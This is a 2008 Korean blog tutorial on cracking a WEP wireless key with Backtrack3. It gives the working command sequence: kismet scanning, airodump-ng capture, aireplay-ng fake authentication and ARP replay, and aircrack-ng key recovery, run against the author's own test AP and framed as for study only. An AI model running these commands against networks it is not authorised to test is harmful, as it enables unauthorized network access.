2008년 7월 13일

Webkey hacking

Webkey hacking하기

webkey를 해킹하는 방법은 생각보다 간단하다.
테스트는 반드시 본인의 AP로만 하도록 하고, 아래 기술된 내용은 반드시 학습목적으로만 사용하도록 하자.

준비 : Backtrack3

1단계
Scan AP






-무선랜카드를 확인한다. 여기서는 rausb0이다. 모드를 monitor로 변경해서 scan하자
※ KISMET을 실행시켜서 모드를 변경할 수 있다.(필자의 lan카드는 wusb54g이다. usb랜카드이며 vmware에서도 지원하고 backtrack에서도 HCL리스트에 좋은 랜카드로 소개되어 있다.)

kismet –c rt2500,rausb0,rt
※ 일반적으로 kismet 실행시킬때는 위와 같이 source를 잘 지정해주어야 한다.



관련파일들은 현재 디렉토리 밑에 저장된다. Kismet~.csv라는 파일을 본다.




알아보기 쉽게 Kwrite로 열었다.


kismet dump는 아래처럼 ESSID;BSSID;Info;Channel;Cloaked;Encryption 순서대로 나와있다.
여기서 WEP키를 사용하는 jihyun이라는 AP를 대상으로 삼겠다(필자의 테스트용 AP이다)


이제 패킷을 모을 준비를 하자

airodump-ng -c 채널명 --bssid AP의 MAC -w 캡쳐파일위치 rausb0

airodump-ng -c 2 --bssid 00:18:84:19:4B:7D -w /root/0712 rausb0





*open시스템인지 확인한다.
aireplay-ng -1 0 -e jihyun -a 00:18:84:19:4B:7D -h 00:1E:E5:A3:BC:BB rausb0


*replay패킷을 보낸다.

aireplay-ng -3 -b 00:18:84:19:4B:7D -h 00:1E:E5:A3:BC:BB rausb0


*Packet을 gathering한다 128bit는 최소 60000 IV정도를 수집해야 한다.

패킷수집이 다 되었다.
*capture된 패킷을 가지고 aircrack-ng를 이용해 key를 찾는다.

aircrack-ng /root/0712-01.cap
실재 webkey와 일치한다.
Successful!




댓글 없음: